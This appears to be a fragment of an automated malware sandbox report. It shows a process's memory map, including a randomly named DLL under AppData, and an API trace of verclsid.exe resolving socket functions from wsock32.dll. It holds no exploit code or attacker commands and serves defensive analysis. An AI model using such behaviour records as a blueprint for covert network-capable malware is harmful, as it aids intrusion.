filename = "\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")
Region:
id = 4662
start_va = 0x7fefb560000
end_va = 0x7fefb577fff
monitored = 0
entry_point = 0x7fefb561010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 4663
start_va = 0x7fef7310000
end_va = 0x7fef7318fff
monitored = 0
entry_point = 0x7fef7311070
region_type = mapped_file
name = "wsock32.dll"
filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll")
Region:
id = 4664
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4665
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4666
start_va = 0x1ce0000
end_va = 0x1d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ce0000"
filename = ""
Region:
id = 4667
start_va = 0x1d70000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d70000"
filename = ""
Region:
id = 4668
start_va = 0x7fefe4f0000
end_va = 0x7feff277fff
monitored = 0
entry_point = 0x7fefe56cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4669
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4670
start_va = 0x7feffda0000
end_va = 0x7fefff17fff
monitored = 0
entry_point = 0x7feffda10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4671
start_va = 0x7fefdf70000
end_va = 0x7fefe099fff
monitored = 0
entry_point = 0x7fefdf710d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4672
start_va = 0x7fefe290000
end_va = 0x7fefe4e8fff
monitored = 0
entry_point = 0x7fefe291340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4673
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4674
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4675
start_va = 0x7fefb670000
end_va = 0x7fefb696fff
monitored = 0
entry_point = 0x7fefb6798bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4676
start_va = 0x7fefb660000
end_va = 0x7fefb66afff
monitored = 0
entry_point = 0x7fefb661198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4677
start_va = 0x7fefc970000
end_va = 0x7fefc976fff
monitored = 0
entry_point = 0x7fefc9711a0
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")
Region:
id = 4678
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 4679
start_va = 0x1a0000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 4680
start_va = 0x1eb0000
end_va = 0x217efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4681
start_va = 0x7fefb7f0000
end_va = 0x7fefb804fff
monitored = 0
entry_point = 0x7fefb7f60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 4682
start_va = 0x2180000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 4683
start_va = 0x2180000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 4684
start_va = 0x22f0000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022f0000"
filename = ""
Region:
id = 4685
start_va = 0x7fefaa30000
end_va = 0x7fefaa44fff
monitored = 0
entry_point = 0x7fefaa312a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 4686
start_va = 0x2460000
end_va = 0x24dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002460000"
filename = ""
Region:
id = 4687
start_va = 0x7fefaa50000
end_va = 0x7fefaa68fff
monitored = 0
entry_point = 0x7fefaa5177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 4688
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 4689
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 4690
start_va = 0x7fefd2b0000
end_va = 0x7fefd30afff
monitored = 0
entry_point = 0x7fefd2b6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4691
start_va = 0x24e0000
end_va = 0x272ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 4692
start_va = 0x7fefa7d0000
end_va = 0x7fefa7dafff
monitored = 0
entry_point = 0x7fefa7d12e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 4693
start_va = 0x2200000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 4694
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 4695
start_va = 0x7fefc0a0000
end_va = 0x7fefc0b7fff
monitored = 0
entry_point = 0x7fefc0a1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 4714
start_va = 0x7fefc530000
end_va = 0x7fefc65bfff
monitored = 0
entry_point = 0x7fefc5394bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 4715
start_va = 0x180000
end_va = 0x181fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 4716
start_va = 0x7fefc6b0000
end_va = 0x7fefc8a3fff
monitored = 0
entry_point = 0x7fefc83c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 4717
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4718
start_va = 0x300000
end_va = 0x301fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 4719
start_va = 0x7fef5d80000
end_va = 0x7fef6936fff
monitored = 0
entry_point = 0x7fef5d81bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 4720
start_va = 0x77e00000
end_va = 0x77e06fff
monitored = 0
entry_point = 0x77e0106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 4721
start_va = 0x7fef5d20000
end_va = 0x7fef5d73fff
monitored = 0
entry_point = 0x7fef5d2104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4722
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4723
start_va = 0x310000
end_va = 0x311fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000310000"
filename = ""
Region:
id = 4724
start_va = 0x2540000
end_va = 0x25bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002540000"
filename = ""
Region:
id = 4725
start_va = 0x26b0000
end_va = 0x272ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 4726
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 4727
start_va = 0x7feff990000
end_va = 0x7feffb66fff
monitored = 0
entry_point = 0x7feff991010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 4728
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 4729
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 4730
start_va = 0x320000
end_va = 0x32cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 4731
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 4732
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4733
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4734
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4735
start_va = 0x330000
end_va = 0x333fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 4736
start_va = 0x2180000
end_va = 0x21a7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 4737
start_va = 0x340000
end_va = 0x340fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 4738
start_va = 0x2350000
end_va = 0x2450fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002350000"
filename = ""
Region:
id = 4739
start_va = 0x2350000
end_va = 0x2450fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002350000"
filename = ""
Region:
id = 4740
start_va = 0x2350000
end_va = 0x2450fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002350000"
filename = ""
Region:
id = 4741
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4742
start_va = 0x330000
end_va = 0x333fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4743
start_va = 0x21b0000
end_va = 0x21dffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 4744
start_va = 0x1c50000
end_va = 0x1c53fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4745
start_va = 0x2350000
end_va = 0x23b5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 4746
start_va = 0x1ce0000
end_va = 0x1cedfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 4747
start_va = 0x1cf0000
end_va = 0x1d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cf0000"
filename = ""
Region:
id = 4748
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4749
start_va = 0x21e0000
end_va = 0x21e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021e0000"
filename = ""
Region:
id = 5207
start_va = 0x21f0000
end_va = 0x21f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021f0000"
filename = ""
Region:
id = 5208
start_va = 0x2280000
end_va = 0x2283fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 5269
start_va = 0x7fefb7f0000
end_va = 0x7fefb804fff
monitored = 0
entry_point = 0x7fefb7f60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 5270
start_va = 0x2730000
end_va = 0x28dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5271
start_va = 0x25c0000
end_va = 0x269ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025c0000"
filename = ""
Region:
id = 5272
start_va = 0x7fefaa30000
end_va = 0x7fefaa44fff
monitored = 0
entry_point = 0x7fefaa312a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 5273
start_va = 0x7fefaa50000
end_va = 0x7fefaa68fff
monitored = 0
entry_point = 0x7fefaa5177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 5274
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 5275
start_va = 0x7fefa7d0000
end_va = 0x7fefa7dafff
monitored = 0
entry_point = 0x7fefa7d12e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 5310
start_va = 0x7fefb050000
end_va = 0x7fefb0a2fff
monitored = 0
entry_point = 0x7fefb052b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 5311
start_va = 0x23c0000
end_va = 0x244ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023c0000"
filename = ""
Region:
id = 5312
start_va = 0x7fefb580000
end_va = 0x7fefb587fff
monitored = 0
entry_point = 0x7fefb581414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 5322
start_va = 0x7fefb7f0000
end_va = 0x7fefb804fff
monitored = 0
entry_point = 0x7fefb7f60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 5323
start_va = 0x25c0000
end_va = 0x268ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025c0000"
filename = ""
Region:
id = 5324
start_va = 0x2730000
end_va = 0x28bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5325
start_va = 0x7fefaa30000
end_va = 0x7fefaa44fff
monitored = 0
entry_point = 0x7fefaa312a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 5326
start_va = 0x7fefaa50000
end_va = 0x7fefaa68fff
monitored = 0
entry_point = 0x7fefaa5177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 5327
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 5328
start_va = 0x7fefa7d0000
end_va = 0x7fefa7dafff
monitored = 0
entry_point = 0x7fefa7d12e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 5329
start_va = 0x7fefb050000
end_va = 0x7fefb0a2fff
monitored = 0
entry_point = 0x7fefb052b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 5330
start_va = 0x2730000
end_va = 0x286ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5331
start_va = 0x28b0000
end_va = 0x28bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 5342
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 5343
start_va = 0x2730000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5344
start_va = 0x7fefce10000
end_va = 0x7fefce16fff
monitored = 0
entry_point = 0x7fefce114b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Thread:
id = 224
os_tid = 0x564
[0550.524] GetCurrentThreadId () returned 0x564
[0550.524] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x3778b0
[0550.525] SetThreadLocale (Locale=0x400) returned 1
[0550.526] GetVersion () returned 0x1db10106
[0550.527] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0550.527] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadPreferredUILanguages") returned 0x77b14fd0
[0550.527] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0550.527] GetProcAddress (hModule=0x77b10000, lpProcName="SetThreadPreferredUILanguages") returned 0x77b13d40
[0550.527] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0550.527] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadUILanguage") returned 0x77b5bba0
[0550.527] GetSystemInfo (in: lpSystemInfo=0x16d960 | out: lpSystemInfo=0x16d960*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0550.527] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0550.527] GetStartupInfoW (in: lpStartupInfo=0x16d928 | out: lpStartupInfo=0x16d928*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xf, hStdOutput=0x21d800000004, hStdError=0x6a06000600010000))
[0550.527] GetACP () returned 0x4e4
[0550.528] GetCurrentThreadId () returned 0x564
[0550.528] GetVersion () returned 0x1db10106
[0550.528] GetVersionExW (in: lpVersionInformation=0x16d87c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0xfdd3bf92, dwPlatformId=0x7fe, szCSDVersion="\峙砀㘀∀) | out: lpVersionInformation=0x16d87c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0550.528] LoadLibraryW (lpLibFileName="wsock32.dll") returned 0x7fef7310000
[0550.537] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.537] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1d70000
[0550.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11
[0550.538] GetProcAddress (hModule=0x7fef7310000, lpProcName="closesocket") returned 0x7feffcd18e0
[0550.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0550.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x1ea8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6
[0550.538] GetProcAddress (hModule=0x7fef7310000, lpProcName="select") returned 0x7feffcd4da0
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x1ea8d00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recvfrom", lpUsedDefaultChar=0x0) returned 8
[0550.539] GetProcAddress (hModule=0x7fef7310000, lpProcName="recvfrom") returned 0x7fef73117ac
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x1ea8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sendto", lpUsedDefaultChar=0x0) returned 6
[0550.539] GetProcAddress (hModule=0x7fef7310000, lpProcName="sendto") returned 0x7feffcdd7f0
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x1ea8d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_addr", lpUsedDefaultChar=0x0) returned 9
[0550.539] GetProcAddress (hModule=0x7fef7310000, lpProcName="inet_addr") returned 0x7feffcd1350
